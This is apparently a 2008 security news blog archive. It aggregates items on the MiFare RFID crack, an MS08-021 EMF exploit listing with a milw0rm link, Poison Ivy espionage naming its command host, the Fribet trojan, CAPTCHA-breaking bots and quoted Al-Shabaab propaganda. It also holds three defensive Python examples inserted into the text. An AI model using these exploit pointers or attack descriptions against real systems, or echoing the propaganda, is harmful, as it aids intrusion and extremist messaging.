On Monday, the Dutch government issued a final report arriving at the decisive conclusion that the chips, used by millions of citizens in the Netherlands, must be replaced. An earlier Dutch report had stated that a security breach on the MiFare cards was possible, but would be too unwieldy for the average attacker to accomplish.

"The attack is really, really cheap," Nohl said. "Before they [the Dutch government] argued that you would need expensive equipment; now we're talking a few seconds on any laptop, so anyone could do it."

Equally worrisome is that there is no need for the attacker to interact actively with the physical card itself. Passive eavesdropping suffices; the attack can take place from a distance. A passive attack from 10 meters away would take a little bit longer than an active attack, Nohl said -- about 200 seconds.

The attack works for any random number generator; it also works against the Crypto-1 cipher in the beefed-up MiFare Plus card.

Many major public transit systems around the world have made the switch from swipe cards to RFID-enabled "tap and go" cards. Switching to these RFID chips for subway passes means that anyone can potentially read a card -- even when the subway rider keeps it hidden in his pocket.

"It seems that all these wireless technologies are hyped for comfort, mostly," said Nohl. "Swiping a card is presented as cumbersome, whereas tapping a card is considered fancy and new. At the same time, these technologies are not really understood in terms of threat models."

The original announcement of the MiFare Classic chip security compromise was presented in December by Nohl and fellow researcher Henryk Plotz at the 24th Chaos Communication Congress hacker conference in Berlin.

Tuesday, April 15, 2008

New Intel on Al Qaeda's Western Recruits

Via CT Blog -

On the heels of CIA Director Gen. Mike Hayden's recent "Meet the Press" appearance, in which he disclosed that Al Qaeda is recruiting and training operatives who "look western" in order to penetrate the U.S., another top spook offered a few additional scraps of information about the new threat on Friday.

"There is attention being given to finding people who can live in the west, have lived in the west, comfortably, and who can appear western, wear western clothing," Charlie Allen, chief of intelligence and analysis at the Homeland Security Department, told reporters. "I'm talking about people who are Caucasian and non-Caucasian."

Allen, who spent decades as a top CIA official, said there was "a shift in Al Qaeda's strategy" after the late 2005 assassination of Al Qaeda's external operations commander, Abu Hamza Rabia.

According to recent congressional testimony by Director of National Intelligence Mike McConnell, it only took Osama Bin Laden's fanatics a mere six months to begin bringing western converts into Pakistan's lawless tribal areas for training. The New York Daily News reported last year that top counterterror officials fear the western-looking operatives can more easily penetrate U.S. security by blending in.

"I would think that you'd believe that Al Qaeda would look to Europe and to North America for such operatives. That's something to which we're very attentive," Allen said.

He also echoed recent comments Homeland Security Secretary Michael Chertoff made to The News, that no Al Qaeda operatives are known to have crossed the southern border from Mexico into the U.S. But, he added, "We do know that going back to 2004, the southern border is something Al Qaeda senior leadership has looked at."

Al-Shabaab Welcomes U.S. Terror Designation, Threatens New Campaign of "Praiseworthy Terrorism"

Via CT Blog -

The NEFA Foundation has obtained and translated a new communiqué released on April 5, 2008 by the Shabaab al-Mujahideen Movement in Somalia. The statement welcomed the recognition of Shabaab as an international terrorist organization by the U.S. government: "As we are a part of the Salafi-Jihadi Islamic trend which opposes the dominance of the crusaders and the aggression led by America, we do not find it unlikely that America would add us to the names of these other honorable men, for whom we are honored to join, at the bottom of their list.” The Shabaab also announced the beginning of a new military campaign inside Somalia under the slogan "Our Terrorism is Praiseworthy": "We swear to Allah that... we will only repeat what our late Shaykh Abu Musab al-Zarqawi once said: ‘we will not compromise on our religion, we will not change the way of jihad, and will not be satisfied with compromises. Between us and the infidels, there is only the sword of Islam.'" On February 29, 2008, the U.S. State Department designated Shabaab al-Mujahideen (a.k.a. the Mujahideen Youth Movement) as a Foreign Terrorist Organization and as a Specially Designated Global Terrorist. According to the U.S. State Department, the Shabaab movement includes “a number of individuals affiliated with al-Qaida. Many of its senior leaders are believed to have trained and fought with al-Qaida in Afghanistan.”

On a related note, the NEFA Foundation is also making available video footage of the "martyrdom will" of "Abu Ayyub al-Muhajir"--an English-speaking Somali national living in Europe, who recently returned to his homeland and executed a suicide car bombing in the city of Mogadishu on behalf of Shabaab al-Mujahideen. The video can be viewed on the NEFA Foundation website.

Gas Gang Uses 'Never-Before-Seen' Device To Hack, Steal From Pumps

Via Local6.com -

An elaborate organized theft ring is using a never-before-seen device to hack gas station pumps and steal unlimited amounts of gasoline in Central Florida, according to investigators in Casselberry.

At least five cars filled with members of the alleged gas-pump hackers were spotted bypassing pumps at a Hess station located on 17-92 in Casselberry late Monday.

"One of the operatives (got) out and used a computerized device to bypass the pumps so they could pump an unlimited amount of gas into the vehicles," Casselberry police Lt. Dennis Stewart said.

Stewart said the officers were noticed watching the crime.

"The group uses spotters and one of the spotters discovered the officers and went over and stuck her head in a window to determine that they were officers," Stewart said.

The woman then signaled the other vehicles, police said.

Investigators said the group scattered, jumping into their vehicles and driving in different directions.

One vehicle remained and tried to run over an officer, police said.

"He wound up striking the officer in the ribs and arm, knocking him backward," Stewart said.

Nearby officers stopped the vehicle as it left the area and arrested Chelsea Harris, 19, and Rhyeen Brinson, 25. Both were charged with felonies.

The other people at the gas station are still missing.

"We'd love to get our hands on the equipment and right now, particularly with one of our officers hit, we'd love to get our hands on the people."

The officer injured in the incident was expected to recover from his injuries.

Casselberry police said they had never seen the device or technology used to steal gasoline.

iPhone's Wi-Fi Positioning System Spoofed Using Laptop

Via Heise Security -

The Wi-Fi Positioning System (WPS) used by Apple's iPhone and iPod Touch and other mobile devices can easily be supplied with false information that makes the mobile think it's somewhere other than its true location. Researchers at the Swiss Federal Institute of Technology Zürich have found that all you need is a laptop, a Wi-Fi access point transmitter and a database of Wi-Fi access point locations.

The MAC address of an active Wi-Fi access point is continuously announced. WPS works by the client detecting the MAC addresses of nearby access points and comparing the cluster of found addresses with a database of clusters referred to geographical locations. The iPhone and iPod Touch apparently make use of the Skyhook Wireless Inc database of Wi-Fi access point locations, as do Nokia Symbian-based phones and PCs equipped with Skyhook's Loki plugin.

Unlike other positioning systems such as GSM, WPS does not triangulate, but instead looks for a specific location-dependent "signature". Professor Srdjan Capkun of the Zürich research team told heise online that WPS may use received signal strength as well, but this has not been confirmed officially. High positional accuracy – claimed to be in the order of 20m – is possible in dense urban locations such as major towns, where the close proximity of numerous Wi-Fi access points results in considerable overlap of their typical 100m radius of access.

But the simplistic WPS location strategy turns out to be its Achilles heel. The Zürich researchers found that they could readily jam the channels carrying real incoming Wi-Fi MAC announcements and substitute others of their own choosing on free channels – there being 13 available channels, not all of which will be in use at any one time and location. By transmitting the MAC address cluster of a distant location, they first fooled the iPhone into thinking they were across town from their real location. However the GSM capability of the iPhone overrides its WPS location capacity, so the researchers had to jam the GSM signal using an additional jammer device before they could carry out their most dramatic demonstration – an iPhone in Zürich that thought it was near the entrance to Holland Tunnel in New York City.

The researchers found that the Apple mobiles were not the only susceptible devices. They repeated the experiment successfully using the Loki plugin on a PC. They also point out that, by transmitting a cluster of MAC addresses belonging to access points that are not in the same geographical area, the localisation algorithm in a mobile device can be confused completely, effectively denying service to the user.
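
The lookup strategy described above, plus the sanity check that catches the confused-cluster case in the last paragraph, as an added example. This is not Skyhook's, Apple's or the ETH Zürich team's code: the access-point database, BSSIDs and coordinates are constructed sample data, and the centroid-of-known-APs estimate stands in for whatever weighting a real WPS provider uses.

```python
"""Added example (not Skyhook's or Apple's code): a minimal signature-style
Wi-Fi positioning lookup of the kind the article describes, with the
plausibility check a client can apply before trusting a fix.
AP database, BSSIDs and coordinates below are constructed sample data."""
import math

# Constructed database: BSSID -> (lat, lon) of the access point.
AP_DB = {
    "00:11:22:33:44:01": (47.3769, 8.5417),   # cluster A, a few tens of metres apart
    "00:11:22:33:44:02": (47.3771, 8.5421),
    "00:11:22:33:44:03": (47.3766, 8.5412),
    "00:11:22:33:44:10": (47.3920, 8.5240),   # cluster B, roughly 2 km from cluster A
    "00:11:22:33:44:11": (47.3922, 8.5244),
}

AP_RANGE_M = 100.0  # typical AP coverage radius quoted in the article


def haversine_m(p, q):
    """Great-circle distance in metres between two (lat, lon) points."""
    lat1, lon1 = map(math.radians, p)
    lat2, lon2 = map(math.radians, q)
    dlat, dlon = lat2 - lat1, lon2 - lon1
    a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2
    return 2 * 6371000.0 * math.asin(math.sqrt(a))


def known_positions(observed, db=AP_DB):
    """Positions of the observed BSSIDs that the database knows about."""
    return [db[b] for b in observed if b in db]


def cluster_is_plausible(observed, db=AP_DB, max_spread_m=3 * AP_RANGE_M):
    """A client can only hear APs within their coverage radius, so every pair of
    APs heard at the same time must lie within a few hundred metres of each other.
    A cluster of MACs whose database positions are kilometres apart cannot be a
    genuine observation; the article notes such a cluster confuses the
    localisation completely, so the client should refuse to produce a fix."""
    pts = known_positions(observed, db)
    return all(haversine_m(p, q) <= max_spread_m
               for i, p in enumerate(pts) for q in pts[i + 1:])


def locate(observed, db=AP_DB):
    """Return the (lat, lon) centroid of the known APs in the cluster, or None
    when no AP is known or the cluster fails the plausibility check."""
    pts = known_positions(observed, db)
    if not pts or not cluster_is_plausible(observed, db):
        return None
    return (sum(p[0] for p in pts) / len(pts), sum(p[1] for p in pts) / len(pts))
```

The plausibility check is the defensive point: the signature approach has no ranging, so geometric consistency of the cluster is the one cheap cross-check available, and a client should treat an inconsistent cluster as "no fix" rather than averaging it into a nonsense position.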

GAO: Stolen U.S. Military Gear Sold on eBay, Craigslist

Via ComputerWorld -

Stolen and sensitive U.S. military equipment, including body armor, night vision goggles, and gear to protect against nuclear or biochemical warfare, are being sold on Craigslist and eBay, a GAO report says.

The Government Accountability Office found many defense-related items for sale on Craigslist and eBay, according to the report, released last week.

After reviewing the policies and procedures for those Web sites, the GAO determined that there were few safeguards to prevent the sale of military items. Although it is not illegal to buy and sell some defense-related items in the U.S., many items are made solely for military use and are not meant for public use, the GAO said.

From January 2007 to March 2008, GAO undercover investigators were able to buy a dozen sensitive items on eBay and Craigslist to demonstrate how easy it was to obtain them, the agency said. Many of these items were stolen from the U.S. military, it said.

The items GAO investigators were able to purchase online include the following:

  • Two F-14 aircraft components, including an antenna, from separate buyers on eBay. The GAO said that "F-14 components are in demand by Iran" and could be used by the Iranian military. "By making these components available to the general public, the eBay sellers provided an opportunity for these components to be purchased by an individual who could then transfer them to Iran," according to the report. "The continued ability of Iran to use its F-14s could put U.S. troops and allies at risk."
  • Night vision goggles on eBay containing a sensitive component that allows U.S. service members to identify friendly fighters wearing infrared tabs on the battlefield.
  • An Army combat uniform and accessories on eBay that could be used by a terrorist to pose as a U.S. service member.
  • Body armor vests and small-arms protective inserts (SAPI) on eBay and Craigslist, including advanced enhanced SAPI plates used by U.S. troops in Iraq and Afghanistan.

Six College Cyber Defense Team Finalists Compete

Via DarkReading -

Texas A&M University looks to defend their National Champions title against five teams when the National Collegiate Cyber Defense Competition (NCCDC) takes place April 18-20 at the Hilton San Antonio Airport Hotel. The 3rd annual NCCDC is being hosted by the University of Texas at San Antonio's Center for Infrastructure Assurance and Security (CIAS), a nationally recognized leader in cyber security education and research.

The CCDC program has grown from five participating schools in 2005 to 56 schools in 2008 with six regional competitions taking place nationwide. The 2008 national competition features the 2007 defending champions, Texas A&M University, along with Baker College of Flint, Michigan, the Community College of Baltimore County, Mt. San Antonio College of Los Angeles County, Rochester Institute of Technology, and the University of Louisville. The participants advanced to the National CCDC after winning regional competitions against opposing teams in the Southwest, Midwest, Mid-Atlantic, Southeast and West Coast Regions.

The CCDC program is sponsored in part through donations from leading businesses in the communications and information technology industries.
"AT&T has always put an emphasis on technology and education," said AT&T president, Western Region, John T. Montford. "We are proud to support the NCCDC's competition that encourages students to find new and innovative ideas that benefit companies like AT&T and partner with UTSA to work toward an ever-advancing field of network security."

Psystar's Mac Clone Still Available For Purchase

Via InformationWeek -

A Miami-based system integrator has changed the name of an unauthorized Mac clone it's selling through its Web site from OpenMac to Open Computer -- and was continuing to take orders for the system as of Tuesday afternoon.

One version of Psystar's Open Computer featured Apple's Leopard OS X 10.5 operating system ported onto generic PC hardware that includes an Intel (NSDQ: INTC) Core2Duo processor at 2.66 GHz, a 250 GB hard drive and an Nvidia GeForce 8600 GT graphics card.

The system is priced at $804.99. A similar, Apple-branded computer would cost more than $2,000.

Psystar appears to have changed the name of its Mac clone overnight -- perhaps in response to anticipated legal pressure from Apple. Apple's end user license agreement forbids the installation or use of Leopard on third party hardware.

Business records show that Psystar is a small company operated by Miami residents Rodolfo Pedraza and Roberto Pedraza.

On Monday, a Psystar representative who would identify himself only as "Robert" said the company is not concerned about legal action by Apple. "We're not breaking any laws," Robert insisted in a telephone interview.

Psystar may be willing to have its right to sell Mac clones tested in court, Robert implied. "What if Microsoft (NSDQ: MSFT) said you could only install Windows on Dell (Dell) computers?," he said. "What if Honda said that, after you buy their car, you could only drive it on the roads they said you could?," he added.

Robert also accused Apple of marking up the hardware on which its operating systems run by as much as 80%.

While it's doubtful a small vendor like Psystar could withstand a legal assault by Apple on its own, the company could possibly draw support from interest groups that are opposed to restrictive software licenses and patents, or even from big hardware makers that, no doubt, would themselves relish the opportunity to market a Mac clone -- if only to counter Microsoft's influence on their business.

Psystar's Web site was up and running as of Tuesday afternoon. The site was offline much of Monday as news of the company's Mac clone spread across the Internet.

Exploit the MS08-021 : Stack Overflow on GDI API

Exploit the MS08-021 : Stack Overflow on GDI API

Author: Lamhtz

Date: April 14th, 2008

Usage:
[filename]

Function: Generate a crafted emf file which could automatically run calc.exe in Win2kSP4 CHS Version with MS07-046 patched but MS08-021 not installed. In Windows XP SP2, explorer.exe will crash but calc will not be run.

http://www.milw0rm.com/exploits/5442

Bot breaks Hotmail's CAPTCHA in 6 seconds

Via NetworkWorld -

A new bot can crack defenses erected by Microsoft to keep spammers from creating large numbers of accounts on its Live Hotmail service within seconds, a security researcher said Friday.

Dan Hubbard, vice president of security research at Websense, said the bot broke Live Hotmail's CAPTCHA (Completely Automated Public Turing Test to Tell Computers and Humans Apart) within six seconds, on average. CAPTCHA is the name given to the distorted, scrambled characters that many Web services require users to decipher and type in to create a new account; the tests are meant to block automated account registration by spammers and malware authors.

The bot, Hubbard acknowledged, is similar to one Websense uncovered in February.

"In the past, though, it was kind of questionable whether the CAPTCHA breaking was automated," Hubbard said Friday, noting that there had been some evidence that spammers were paying people to decode and type in the CAPTCHA characters. "But the bot's breaking [CAPTCHA] in six seconds, so it's definitely automated."

In a long post to the Websense blog Thursday, Sumeet Prasad -- "our CAPTCHA expert," said Hubbard -- provided technical details of how the bot automatically registers Live Hotmail accounts and then immediately begins using those accounts to spew spam.

The bot's total response time -- how long it takes the program to grab a CAPTCHA image, analyze it and return with the correct code -- is considerably shorter than that of earlier such bots, said Prasad in the blog.

One in every eight to 10 attempts to create a Live Hotmail account is successful, added Prasad, meaning that the success rate is 10% to 15%. However, the rate is actually meaningless, said Hubbard, since the bot will continue to try to create accounts using a predetermined list of account names until they're all registered.

E-Passport Hacker Designs RFID Security Tool

Via Wired.com -

The team that produced the RFDump research/hacker tool for cloning and altering data stored on radio-frequency ID tags has now come out with a product to thwart RFID hackers.

German security researcher Lukas Grunwald, who made headlines two years ago for uncovering security vulnerabilities in new electronic passports being adopted by the U.S. and other countries, created RFDump with colleague Boris Wolf in 2004.

Now the two have created RF-Wall (shown on the lower shelf in the picture at right) to help thwart RFID fraud and attacks against e-passports, electronic access cards and payment cards -- such as the Mifare Classic card that is used in the London Underground and which security researchers recently cracked.

The device, which Grunwald and Wolf are producing for their new California-based company NeoCatena, is a hybrid firewall and intrusion-detection system that sits between an RFID reader and its back-end system. It's designed to detect counterfeit and cloned RFID chips and prevent an attacker from injecting malware into a back-end system with a rogue RFID chip. They'll be debuting the device this week at the RFID Journal Live conference in Las Vegas but gave me a demonstration of it this weekend.

The box can be loaded with virus signatures to detect known types of attacks and uses heuristics to detect other malicious activity, such as generic SQL-injection attacks (such as the one that appears in the screenshot above right). The device can be restricted to read only RFID cards that have specific serial numbers and reject all others. It also can be used to digitally sign chips so that any chips that are altered after being issued are rejected by the RFID reader. The system uses the HMAC algorithm for the digital signature. Grunwald and Wolf hold a patent on the use of HMAC with RFID technology.
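
The HMAC signing and serial-number allow-listing described above, as an added example of how a reader-side gateway can apply them. This is not RF-Wall's or NeoCatena's code, and the tag layout, key and UIDs are constructed for the example: an HMAC over the chip UID and the stored payload is written to the tag at issue time and recomputed on every read.

```python
"""Added example (not RF-Wall's or NeoCatena's code): HMAC-based tag
authentication of the kind the article describes, applied by a gateway
between the RFID reader and the back end. Data layout, key and UIDs are
constructed for this example."""
import hashlib
import hmac

# Constructed issuer key. In a deployment it lives in the signing device or
# HSM, never on the tags or in reader firmware.
ISSUER_KEY = b"example-issuer-key-not-for-real-use"
MAC_LEN = 16  # truncated HMAC-SHA256 tag stored on the chip


def issue_tag(uid: bytes, payload: bytes, key: bytes = ISSUER_KEY) -> bytes:
    """Data block written to the chip at issue: payload || HMAC(key, uid || payload).
    Binding the chip's own UID into the MAC means a valid block copied onto a
    chip with a different UID (a clone) fails verification."""
    mac = hmac.new(key, uid + payload, hashlib.sha256).digest()[:MAC_LEN]
    return payload + mac


def verify_tag(uid: bytes, block: bytes, key: bytes = ISSUER_KEY) -> bool:
    """True only if the block was issued for this UID and is unmodified."""
    if len(block) < MAC_LEN:
        return False
    payload, mac = block[:-MAC_LEN], block[-MAC_LEN:]
    expected = hmac.new(key, uid + payload, hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(mac, expected)  # constant-time comparison


def gateway_accept(uid: bytes, block: bytes, allowed_uids=None,
                   key: bytes = ISSUER_KEY) -> str:
    """Decision the gateway makes for one presented chip, in the order the
    article lists the controls: serial-number allow-list first, then signature.
    Returns "rejected-serial", "rejected-signature" or "accepted"."""
    if allowed_uids is not None and uid not in allowed_uids:
        return "rejected-serial"        # only specific serial numbers are read
    if not verify_tag(uid, block, key):
        return "rejected-signature"     # altered or cloned since issue
    return "accepted"
```

Two design points worth noting: the verification key never needs to be on the tag or in the reader, only in the gateway, and the UID binding is what turns an integrity check into a (weak) anti-cloning check. It does not protect against replaying a genuine, unmodified chip, which is why the article pairs signing with a serial-number allow-list and intrusion detection.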

Monday, April 14, 2008

Williamson County Woman Jailed for Cyber Fraud

Via KXAN.com (Austin) -

A Williamson County woman is in jail after police said she stole more than $213,000 in fraudulent reimbursement claims.

Lauri Jean Arrington worked as a software installer for a firm hired by Cadbury Adams. The company said Arrington installed a program to submit reimbursement.

Arrington then hacked the program and directed false claim reimbursements to two personal bank accounts in Williamson County.

Police said Arrington stole the money over three years, from March 2005 to March 2008.

She faces three felony charges.

Sunday, April 13, 2008

E-spionage: Phishing for Classified Data

Via BusinessWeek -

The e-mail message addressed to a Booz Allen Hamilton executive was mundane—a shopping list sent over by the Pentagon of weaponry India wanted to buy. But the missive turned out to be a brilliant fake. Lurking beneath the description of aircraft, engines, and radar equipment was an insidious piece of computer code known as "Poison Ivy" designed to suck sensitive data out of the $4 billion consulting firm's computer network.

The Pentagon hadn't sent the e-mail at all. Its origin is unknown, but the message traveled through Korea on its way to Booz Allen. Its authors knew enough about the "sender" and "recipient" to craft a message unlikely to arouse suspicion. Had the Booz Allen executive clicked on the attachment, his every keystroke would have been reported back to a mysterious master at the Internet address cybersyndrome.3322.org, which is registered through an obscure company headquartered on the banks of China's Yangtze River.

The U.S. government, and its sprawl of defense contractors, have been the victims of an unprecedented rash of similar cyber attacks over the last two years, say current and former U.S. government officials. "It's espionage on a massive scale," says Paul B. Kurtz, a former high-ranking national security official. Government agencies reported 12,986 cyber security incidents to the U.S. Homeland Security Dept. last fiscal year, triple the number from two years earlier. Incursions on the military's networks were up 55% last year, says Lieutenant General Charles E. Croom, head of the Pentagon's Joint Task Force for Global Network Operations. Private targets like Booz Allen are just as vulnerable and pose just as much potential security risk. "They have our information on their networks. They're building our weapon systems. You wouldn't want that in enemy hands," Croom says. Cyber attackers "are not denying, disrupting, or destroying operations—yet. But that doesn't mean they don't have the capability."

Google Shares its Security Secrets

Via ITNews.com.au -

Google is offering security professionals a look into its security systems.

Scott Petry, director of Google's Enterprise and founder of security firm Postini, explained to attendees at the RSA conference how the company handles constant pressure and scrutiny from attackers.

"Google is a very very high-value target," Petry noted.

"If you have bad intentions and want to get a reputation, hacking Google is the best way to get credibility on the streets."

In order to keep its products safe, Google has adopted a philosophy of 'security as a cultural value'. The programme includes mandatory security training for developers, a set of in-house security libraries, and code reviews both by Google developers and outside security researchers.

"The most important thing that our security team does is educate," Petry explained.

"Educating people is the most important thing a security professional can do."

Petry contended that in an age where both users and companies are increasingly relying on outside services and applications, it is becoming nearly impossible to fully lock-down a company.

"IT is largely fighting yesterday's battle," he said, in reference to the policy of trying to restrict all user access.

"Start saying okay, if these things are going to happen, do an assessment to try and bound the risk."

Petry noted that in addition to educating its employees, the company also implements software 'guard rails', which warn users when potentially risky actions are taken and later logs them for administrators to archive.

For software developers, Petry also suggested taking a 'neighbourhood watch', approach to vulnerability disclosure. For Google, this means sharing more information with researchers and trusting them to do the right thing with their discoveries.

"If you find a vulnerability, we ask that you share it with us. If you share it with us, we will respond to you with a time we will fix that hole," explained Petry.

"If we do so, that is our responsible response, please don't disclose [the vulnerability]."

That philosophy, combined with a policy of crediting all researchers who report flaws, has been very successful for Google, said Petry.
---------------------------

Security training for developers & code reviews from third-party security vendors.

No secret there, but it works....and it is always shocking to find large corporations that don't take these simple yet effective steps to secure their products and environments.

Basically PCI v1.1 was worded to encourage companies to do code reviews....but most want to ignore the core problems and install loads of application firewalls.

IBM Research Spins 'Racetrack' Nano-Magnetic Memory

Via InformationWeek -

A next-generation nonvolatile memory dubbed "racetrack" is expected to initially replace flash memory and eventually hard-disk drives, according to IBM (NYSE: IBM) Corp. fellow Stuart Parkin of its Almaden Research Center (San Jose, Calif.)

Using spintronics--the storage of bits generated by the magnetic spin of electrons rather than their charge--a proof-of-concept shift register was recently demonstrated by IBM. The prototype encodes bits into the magnetic domain walls along the length of a silicon nanowire, or racetrack. IBM uses "massless motion" to move the magnetic domain walls along the nanowire for the storage and retrieval of information.

"We have now demonstrated a current-controlled, domain-wall, shift register which is the fundamental, underlying technology for racetrack memory," said Parkin. "We use current pulses to move a series of domain walls along a nanowire, which is not possible to do with magnetic fields."

IBM's goal, based on spintronic patents filed as early as 2004, is to use the same square micron that currently houses a single SRAM memory bit, or 10 flash bits, and drill down into the third dimension to store spin-polarized bits on a sunken racetrack-shaped magnetic nanowire. Using an area of silicon 1 micron wide and 10 microns high, IBM said its first-generation racetrack would store 10 bits compared to one, thereby replacing flash memory. Eventually, it could store 100 bits in the same area, which is dense enough to replace hard-disk drives.

"Racetrack is essentially the third turn of the crank of this new field of engineering called spintronics," said Parkin. "In current solid-state memory devices you store and control the flow of electrical charge. Here, we store and control the flow of the spin of an electron."

Electronic Voting Experts Tell Vendors to Work with Researchers

Via SecurityFocus -

Hackers finding flaws, vendors reacting with threats: The relationships between security researchers and voting machine makers resemble the early days of the PC industry and that's not good, e-voting experts said at the RSA Security Conference on Thursday.

Computer scientists and academic security researchers have managed to find numerous and serious holes in the security of electronic voting systems in the past decade, despite the assurances of voting system makers that their machines are secure. It's no surprise then that rather than fostering a partnership between the hackers and the vendors -- as Microsoft managed to do over the past decade -- voting machine makers continue to be hostile to those that find vulnerabilities. That lack of a relationship has to change, a panel of five electronic voting experts told attendees.

"There is so much distrust between the academic community and the vendor community, that no one is working together," said Alec Yasinsac, associate professor of computer science at Florida State University. "I think it is essential for the vendor community to step up and engage the academic community."

A major issue with most electronic voting machines is that there is no way to do a software-independent audit of the election results. In the 2006 midterm elections, many states took extra security precautions after researchers found that Diebold's election systems contained a serious flaw. Another election system failure may have resulted in a loss for the Democratic challenger in a contest for one of Florida's seats in the U.S. House of Representatives, when the configuration of the electronic ballot likely resulted in a large number of people in a Democratic-leaning county failing to vote.

Given their history, vendors and researchers have their work cut out for them in creating an amicable relationship, said panelist David Wagner, an associate professor of computer science at the University of California at Berkeley.

"Voting system vendors are, today, where Microsoft was ten years ago," Wagner said.

And for Microsoft, it required a strong commitment from its CEO Bill Gates and hundreds of millions of dollars to better secure its software.

Fribet - Attacking Your Backend Database from Your Backyard

Via McAfee Avert Lab Blog -

Just a month ago, we blogged about massive security incidents, relating to SQL injection attacks, that insert iframe links to remote sites that host exploit scripts and malware. Recently, we discovered the Fribet trojan, where the author was riding on both the success of such attacks and the controversy of the Tibet issue. The trojan was discovered on pro-Tibet sites that were possibly hijacked to host Exploit-MS07-004, which appears to be specifically crafted.

When visitors of the pro-Tibet websites are infected, the Fribet trojan provides remote control and monitoring functions such as creating new files or folders, starting or terminating processes, and sending/receiving additional malware. Additionally, the Fribet trojan loads the “SQL Native Client” ODBC library, and is designed to receive arbitrary SQL statements from a command and control server. In turn, the ODBC library provides the functionality to Fribet to bind SQL connections and run arbitrary SQL commands from the victim machine(s). At the time of our research, the command and control server was not sending us commands. However, our reverse engineering of the malicious code shows it is more than capable of the following:

  • Bind and connect to local or remote databases from the victim machine
  • Query and steal data from local or remote databases
  • Insert arbitrary data into local or remote databases, including web data such as hosting a web exploit

The attacker still needs to find out the information required to connect to the database, such as DSN, hostname, database name, user name and password; however, that information can be collected via the other monitoring functions of Fribet, and it can also enumerate weak and default values.

This trojan apparently can be used as an alternative to SQL injection attacks, but in a more direct way. Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector.

----------------------------

Clearly, this is a trojan designed to attack corporate users....

Researchers Uncover Information Black Holes Across the Internet

Via tgdaily.com -

The reason why you cannot reach a specific web site at any given time can be very simple. Server and hosting issues, maintenance or the plain fact that a site has been discontinued are the most likely explanations why a site just won’t load. But there is another, more mysterious possibility: Black holes. A team at the University of Washington (UW) has begun mapping scenarios where information packets on the Internet simply disappear.

"There's an assumption that if you have a working Internet connection then you have access to all of the Internet," said Ethan Katz-Bassett, a UW doctoral student in computer science and engineering. "We found that's not the case."

Katz-Bassett has been working on a project called Hubble, a system that apparently is able to track what he refers to as information black holes. These are situations where a path between two computers does exist, but messages - a request to visit a Web site or an outgoing e-mail - get lost along the way. Katz-Bassett has published a Hubble map that enables users to monitor such black holes worldwide or simply type in a network address to check its status.

To determine a network status, Hubble sends test messages “around the world” to look for computers that can be reached from some but not the entire Internet, a situation that is described as “partial reachability”. Katz-Bassett said that short communication blips are ignored. However, if a problem surfaces in two consecutive 15-minute trials, it is listed as a “problem”. The research team found that more than 7% of computers worldwide experienced this type of error at least once during a three-week period in fall of 2007.

"When we started this project, we really didn't expect to find so many problems," said Arvind Krishnamurthy, a UW research assistant professor of computer science and engineering and Katz-Bassett's doctoral adviser. "We were very surprised by the results we got."
----------------------

Very interesting....
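The "partial reachability" rule described above (reachable from some vantage points but not others, flagged only after two consecutive 15-minute trials so that blips are ignored) is easy to misimplement if the streak is not reset on a gap or on a fully reachable trial. The following is an added example written for this post, not Hubble's code; the vantage-point names, the TEST-NET addresses and the probe results are constructed.

```python
"""Partial-reachability classifier modelled on the Hubble rule quoted above.

A target is 'partial' in one trial when some vantage points reach it and
others do not; it is listed as a problem only when that state holds for
two consecutive trials. Example code for this post; the probe data is
constructed (TEST-NET-1 addresses), not real Hubble output.
"""
from dataclasses import dataclass
from typing import Dict


@dataclass
class TrialResult:
    target: str
    trial: int                  # index of the 15-minute trial
    reached: Dict[str, bool]    # vantage point -> reached the target?


def classify_trial(result: TrialResult) -> str:
    """Return 'reachable', 'unreachable' or 'partial' for a single trial."""
    values = list(result.reached.values())
    if all(values):
        return "reachable"
    if not any(values):
        return "unreachable"
    return "partial"


def unreachable_from(result: TrialResult):
    """Vantage points that failed to reach the target (handy for triage)."""
    return sorted(v for v, ok in result.reached.items() if not ok)


class HubbleMonitor:
    """Tracks per-target partial-reachability streaks across trials."""

    def __init__(self, consecutive_required: int = 2):
        self.required = consecutive_required
        self.streak: Dict[str, int] = {}      # target -> consecutive partial trials
        self.last_trial: Dict[str, int] = {}  # target -> last trial index seen
        self.problems: Dict[str, int] = {}    # target -> trial when first listed

    def observe(self, result: TrialResult) -> str:
        state = classify_trial(result)
        prev = self.last_trial.get(result.target)
        consecutive = prev is not None and result.trial == prev + 1
        if state == "partial" and consecutive:
            self.streak[result.target] = self.streak.get(result.target, 0) + 1
        elif state == "partial":
            self.streak[result.target] = 1      # new streak (first trial or gap)
        else:
            self.streak[result.target] = 0      # fully reachable/unreachable resets
        self.last_trial[result.target] = result.trial
        if self.streak[result.target] >= self.required:
            self.problems.setdefault(result.target, result.trial)
        return state

    def problem_list(self):
        return sorted(self.problems)


# Constructed probe results: three vantage points, three targets.
CONSTRUCTED_PROBES = [
    # partial in two consecutive trials -> listed as a problem
    TrialResult("192.0.2.10", 1, {"seattle": True, "tokyo": False, "berlin": True}),
    TrialResult("192.0.2.10", 2, {"seattle": True, "tokyo": False, "berlin": True}),
    # partial, then fully reachable, then partial again -> blip, not listed
    TrialResult("192.0.2.20", 1, {"seattle": True, "tokyo": False, "berlin": True}),
    TrialResult("192.0.2.20", 2, {"seattle": True, "tokyo": True, "berlin": True}),
    TrialResult("192.0.2.20", 3, {"seattle": False, "tokyo": True, "berlin": True}),
    # unreachable from everywhere -> an outage, not a black hole
    TrialResult("192.0.2.30", 1, {"seattle": False, "tokyo": False, "berlin": False}),
    TrialResult("192.0.2.30", 2, {"seattle": False, "tokyo": False, "berlin": False}),
]


def run_demo(probes=CONSTRUCTED_PROBES):
    monitor = HubbleMonitor()
    for probe in probes:
        monitor.observe(probe)
    return monitor.problem_list()


if __name__ == "__main__":
    print(run_demo())  # ['192.0.2.10']
```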

Saturday, April 12, 2008

Next Version of PCI DSS Due in September

Via TechTarget -

PCI Security Standards Council General Manager Bob Russo said merchants can expect the next revision to the Payment Card Industry Data Security Standard in September.

"I can't really tell you if it's going to be a rev, or a new version number. In my mind, it doesn't really matter if it's a 1.2 or a 2.0; anything that gets changed is something you've got to address," Russo said. "It won't be anything too drastic. It will be based on input we've gotten over the last year and a half from all of our stakeholders."

Russo said some of the areas that will be tweaked or clarified will be around wireless implementations, application security and pre-authorization.

Russo is attending RSA Conference 2008, where thousands of IT security professionals have gathered this week. PCI and compliance issues are among top concerns of conference attendees.

